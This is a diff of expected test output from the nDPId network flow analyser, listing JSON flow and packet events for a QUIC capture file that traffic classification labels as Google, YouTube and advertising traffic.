-00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} 
-00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
+00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861442,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1621433861442,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433861442,"pkt":"AAAAAAAAAAEAO9I5CABFAAViZLJAAH4RY5aokEAF2f5sruDdAbsFTnSvyv8AAB0IrXE1PswUxeQAAEU0moW2I5LE8O2RChniUsRu3mGuowplCLtASVZHqsnxug4PsDrEW3Sj\/leTPqj5zsaBrtRlsbN9lOBqairoOcWnpMpgmaHQCpPptKrsTiKLv9DzkKDiiyP+Mqe+\/mlEdOWIT57m\/bm9VRc8tH+phNv28+B7nLrNXNbf+JIcCMe3B97c2i01lE5nP9lOGBndD+gNN+RzjizdPjT7CsIXwfii\/vPw0hQi3TTTCgYsoE3qaYNZIQa7y+ZulLHbauYPh7IRvVbsW6oMX5mqUpOCkwTG7qK3J0PWf+WY+NS17Sud\/qUl+vWLY3nRgL5hCL2d62+ht1MFTAd\/54SptMH7UTOp0SLwM2rzQ7K1vfHvBg0P1XtZu5\/ZPCWf9HzATlzy7lSiJk6IgXbAhRFG1G8fUp4\/ofu+HGCEF\/7UDhsGZrHHdSkUntprrQdJrtC9uwLQHDmvwvf+IflTbSL1rDFYxHI8L4wWpQGIUOrApnE\/9cNQvTN\/qDlFELbRPZMI+sgmXFe1wpxWQvJnUzbEgibgAlOEoK0YMMr00gbYRHnt\/XmwqnfPUMgFPhthy2NaZGYNKqtyo2LV+qQNOXTYs+yqM7Oe60KVRE8NtfRjTThOKaPHFROsWvuzwA+ukNXH9pokuvNAsPejuPAD\/pIIAFoeLo9EdQWTjq8bmJHRJLeQdgOixkkn6ZENEVhcApyT3Cjpyjy6XOyeAvH1rOAqQH1f5XGmtLPBx0PHlTgWwMQNd1EMcY81AvslHkFJ28FdohsGkQMrtF6QnW4yyffpqKjZGXR4Aft\/6zwVouPtFf+c842WgjqV9zAXzrH+Q4FG8Bkm133cuN6x\/UQ
jBUG9ulPeffB4LFwzJ6cgdlk8sALE9OsSEEFoZ7Kgq2RJG2B4QiAcvJ\/G23JlL4GPLCphHQL+uuXuBJ53c0dwm5IgyJmL+Fkv\/oWmjZHaja9h6d+MuXfjhw22jLCFl4NqE+v2ig\/Upn3KknaXhJpMXjSzUNFPLHancjwMFUrmgiHOiCGbChAN7KNYiHqvDaXEYjnuJfY1oM5mhTGv+oeOS3sb+HmH2iJecdF8bXE2rbafbwa6Uiv9ikM1BTBN7UiXD5IlCeKhBSPAXD2EauGLnJC8pFr5zgHjAQh4mgtnSEZQ0zN3cIdAyuQFOV8jS+\/nBwLOE8x1n4uqLxML18glCa2oWZgACniabrs7r2NaqfObdjspQwzjkU1TDyb5gdlLj\/eHIpfAuefXCBvRbCcBcf3j6IilvS6+AsNo2EQaT9604HtRnmqrZY9SdTX65A28Jmq3pM9OvQ\/TUFf5yYcqxQ9haiwBaX+NvsVDdtRqsd5\/7eI5m8Kz23+blc4m9ONL7svDOPbX8ss3fOhktK2bl8ThuCTTF503OHo06Lwdf8CjZvVZNlx9x5F\/PfM3mGcuSEt3i52BYpDCMhsRFqfjcUkuPmzCH58lXX47a19QYjODRwQE3Q0zKcLxx79OB9EdMQ85AedN\/Yq1ncVuwuxGbXOoZGRxYBpfpp+NMq0YojthjxX0BlTnVyrSw5lnJpqEdmlVw2bcD9yZZWHwXJvKr5qpx\/cr9xPEvlHadBYAjoEENWkL3gQJjVHBrOhAB1uTYhdNnltIi8vWgTzELMZlpUHeqiLODHWpAl4WXW8xnY8PcTaYP+SnKQgJmd43Zakfel6+p23x5PQixUcbkwGMl2kk7UtX\/gGRLqBBO2NRLJN5MePtLUrUVSVwbZY282tQGPil07XxyVmzfQkhzkp4eJ5a\/N1QTFtfiCHdNogD"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861442,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r2---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861442,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r2---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861875,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1621433861875,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433861875,"pkt":"AAAAAAAAAAEAAWXVCABFAAViHWZAAH4R2UiokEAFjzSJEsyjAbsFTgvjw\/8AAB0I4XSW+s91uvMANwAS6GfjW0GMdTsqKMpwqTx337NvtDulmldgfnpNodm4QCw5Bjnjn9W+uBm+YhsF1Trj\/EVP9+xE\/ehiNLKErhY79Fc\/HJEeNp62+UYmQIxnF4BXHeby7saDvvQlaWtUhK2nNgwODZK+JDEtxkUQ\/VybQVP83ATzWc0qLvD8yBtR7czNUAqQeB0mf7V5GtJz0rLXU9erE4DOq5Qs\/9FCIz7bDlqW8m3GqwlAlM\/ShYpSh+i1tk19DnlT9d71cXWxAaBMh3SgHyMdgTEnDOAcddGzDaeO7lK6Q+fWEYvrhEHvLyLGKNSZUeJYxc\/icjZAwxx1JsyytVVfcjM\/mcdecpSw9Bmojler9Rg2Ujayse\/kuXuiAg+1NTMXX33ZL2rhDQtAjmZrBrfEVHGmJy+0cMtd+79bvpVApkexLNObFkVRwaBswWlkZfKVtffBr4kfbBTWyXOmnhO01cFVCjdQL\/BWZouvBCtlDnK59GQE47E\/QE9JjfWDLKIpllBc19+E+UnP0GbmHg\/0unruvB08k6BhVSiKRaeDIjirm9O9wbEuKHWikZtOKgn0vdcW3o49vZELiyS8Oh0eH9i10QOv1F\/ixGOhJ7Q9oRu9TNyMYSO08q0kVm7c2CA73Gt23SuU\/bhClfdnHjyNCfLe1tTbcknZFj\/ikotBSaPjBSmkP\/K1gB+2W38hHc\/pDDGJn\/1HKhUE2jJHeTGdUUEt\/nIx7qb\/Qem+IcovQc0vl5iKASp+ml4MLegR\/yOFMMAwayIHpj4zjxWU8b5eorYjA3a11PNOPq+Diwo4jSkCwWP\/NQrR6of3bBVoaXisVa9wpr4IMIfCHiFcIgOR96+r4oTypl7Gu8zq2gdbwI6YjUXUc52tqJWY3kkxwvYV3OqU8QnVDcS8NgM3sBNbtUWYevWYZ5kG\/xc6I9RBB93tEOa2yK\/MLrNRzd2ly4YTi8cHvLzZ4JO8StA2rNVX7gEP+80+zHm0dnXITPxyYwSedSInn\/pNvSAPgpaQZutI98VHsSgXt2AGJ1MMrh4KLNemtCZ0sd2YqrNsd0v\/Q\/CUZ1ILOe3p+l5wVi9Zn43HdgMKjjQliDoQWt6oPzDKQdarw2zvf2CSBY+WIBwbxkvSJ254+5B740QdtviqaFSVrXzi7RfFwi+ivbVv+NHhY1sdpuJtIIOCprt6WYhs+StriI4nyZAJwcdp32W8aqvb\/1985ZY6u+nxx4f2trOGoh+bHJBuPbElLY3maoHSuOXZ785q+vKdky1ER+vTTeciB3UUV2EsQxGisoRd3HsY14dMPd\/KtnJkfnSo9huSkgv6uqscOmR3O15K2wVr1cJTHHoYe8xmAfEt31ohtVVGBkqoyfKwhTy83VRvvkyyeMMzfXCvOEXQzPUnps\/izhGZQO1uJuDErdBO8cpI3nRLPMCD\/UdOq6K0a\/lUA2\/RmUzFI+l6dkQCJFczxVxFEs
gIriEhhycx8gi4LqlH4ujmWOaJbxFhSFcxnusPel+AYrO\/saFdGOX6zbAvXOzVPrMBiZjZC6L4YNHykbx\/ACsbmx2tWJ0UBsImPtqc3VN8uY2G\/l672JNHVL4kWCmPOASo\/9VfXHfz9oDR2A9rIFyPu2yDMiXJyLW7o6SypanBfAjWm99ANW\/QN19miCc22rNTHysZikzeNz6bIeFmyLS3Ngnlk7euJrOCdUrQrLMzQVLmQ\/RtVvjMOEklG0mmb1U0vbtTHQFDaG3odQNuXNPFHDfi8wFpWHR9i\/WEKv+nJwW23RrP6NiuaqLXBX+0"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861875,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861875,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00602{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":71,"packets-processed":70,"total-skipped-flows":0,"total-l4-payload-len":94500,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":58,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":58,"total-idle-flows":55,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":248,"global_ts_msec":1621433949433} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433949433,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1621433949433,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433949433,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi\/AZAAH4RFwGokEAFcfqJ88LEAbsFTrCcz\/8AAB0IOpZExBi7cWoANwDL9uHaA0kckkofYv0DErOJu7gbuZ9O0WlrHu9XY7EghfeNZiWwbeaMEG1HVz2HXjvb7FiIQLhE\/XrtpQvuu\/3Omn1Xc2On2DZgH7f6oOHpbPUOYpms0\/qyqv6hTxaVN8Qyf9zFprmCdbR0TKFMTov\/mcwAhmtaqiJQOX1idcPmDuEg7iPhXhQ9Rg3RwrAk9BrfJvQxFfeEOMteWZD4MyDZ+yV9SiAuwwh+aqsiPNuxGOL+UtAzKQsqxym7hzR1q28tmGh+i2Zfk\/fZfni9+9jCbMGXciLv74dlIT7PTJbDgcbiIKwlBsLy\/knykvOWyjY094BIkBXk3yU5NleET3fprZZxZhV8ZWXPFIPEaF+RU6Htv70MXhBjSUlUKboeasdJJiERx9PP\/FOQwZ9brIMVelncnCNFZ46nArIPtPpuAd\/21AcBQuAfrDAMwGty4EHlw\/4EpTckdi6e8Q1HZa8uOZS8L8Br1Me9zLoyL4ZjxYSKprCH0SP1KvhqYL3GHK4Qay7ZVNjLEb+G56Co2cVZ6Z8h9R\/Vb5Kkek+Pkji+2fhLMmeX7GKMME7SjXSMGgLh6kG9e35UGvMzTHWm2oiUJJo5etspIs8CqI2hin1wFD6+4iM6vgMpZ1\/0hibOtrqATrfcRXn\/g3FcL\/RO\/V+7mXSO42YkAYxLa84v0N\/qNcWbspbFv6UUuZtGqJZj6gNVEV6zKBOfhdaZA6YCWC4HGrFtWO5PpwwVCgG3aalQZk8NUuhTNMXowyvh9L18LCMzCzLXkkowVa1Yrk+ACBdqcZ0NdAszss2Z\/EjjNmNifpEEEqUfgXYXLLAXFUhdn9KTgkgQJb6GidRjtio+hiOES7K\/Zd7kR9Rp9Q8wDhX+D6mhrqnUubbVrqMcM5J\/ZatN2j1E7+O4tATjd9IDFwcw4kKULkoQtjBOYHy1h\/oATwVF+VEEk5TAZlZMx5wT0IH9U8MEWVD8KooUS4KhPU7qWcQbSeYILfK051yDU8v1p35RNAMARwMz+aDEiPOl1NvT3vNB0NKpyA8dp2SOTKCt+U38vG+GnQA9V62d7ZUKYJ3KlxmDU6XA53hOV25AFsiPuoW6Iyhmf6HsaasYpE\/s6FIsRYPDWGHRq1MdouHttvkvAO+x3GFakZh3SiKhTE80kxe41OgEyoVuUyhRjr87DNUuENvzYlvEniWFEMpKV3srA\/SEnULC+0Ec4J3ujljBaufKdfF8SZpoN9j7BrC+MAqJq3d3VhpBG26mGJXkkc4FOZBB0fM\/Lhy0kTI83pcFnGWjj7XjivhZl42l7vBIKLjvLvvCQDgRAJQidieJyJhRuZYNfeY8eJjBRqpIKNqtcSkkmENkCxAYMCiOc0b0eIGuyHwfWl9DZKgiIkTs1P8VjoiaVtyxt\/mMFzkrdTau0IQVNDUvaqFADarA4i6F5X\/ztcJlv95UshqbL5rcKZuqHaDiKMW08lYpiu
mS+l0yCHCZdSG\/JKiFlfvCQuuO7wI8YM6N7g2OYZA0jS7vIYCufcCVOzadPPeliEKT+SdqnyQb1rT\/MrPC4qmZRKIvY7jNy8gfCXgs7p4XgbHvnaS7Dr9uRFum4Sn9Lk+LXgtcZE6ZRI7CQvZwF9N6AC\/1sN8XoPIf\/S8UYH\/UrL8QIB2dvW8d4m9grwcwhaVNrzDuYlH1t5w04qvmeO0jLTMXCRV\/LhJb7I6BPjU9fi6dVMzhz3YRA0knZgi9sfYpy0b4laLv5IQhdo7jIDxnDb0cqwQffN65VEIrS8UKXodV6nKpQ21X"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433949433,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433949433,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": 
{"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1621434024831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621434024831,"pkt":"AAAAAAAAAAEAO9I5CABFAAVijfVAAH4RD4yokEAFubq3ue4VAbsFTpL9z\/8AAB0IwEpXITGNfFsANwCxWhQSYIUF\/WvpOS2d24m86qS7bcPY9ZqXL9ETLTiw416RPBiWWmatxUNDS4V+myDEXn29IuVE\/cSbBImAl6aiOQIEBTB\/SXbMixQXFNoJB8yYQYz6wms++ZMMx\/E4BhzwHBpTBXPh7b4mD3YSWE+XxUv9H9L2UZXkzlxf97xn0ny\/fPI\/0BBls5vpYFjJSYZYoIlr6vhdm\/ebeHlyzz6B8ygezIiK3UwVDadwbjMZG9Omuh7X1DhVgs3vz1W21fFGWXozYn3VF4XUTA2SbApAP2UYTQPidrIUUsyN9OEN+6zFcRKwBgiXUg0JDK+e1z3gz3W745d\/sI1uFMBbzhwnhKRBQCTyj6OoDAeCCoqL11AGEcZlyCkzwplqlHqv3BulzvKXdH9fy+hypwspz5JB3rBva7abdmpAfrNWtysCkoMbDEsi+BH9Sw\/WfI\/JW43OziRxWE0b\/6GaLLm0LPRqG0ta2a+8bSNrTX8mMiYpr81yyeAJGf+3SLq39ywLsaDDH+SnGlydZPTKaT5dEVTmOUfwB8TyliRH7r2g\/e8Jo89ZNHbaMlGDbYtZHnJ\/oXmkMMX0TtfMqSbUAI13SGw0x0yqJUBVeqWXi6nCYI
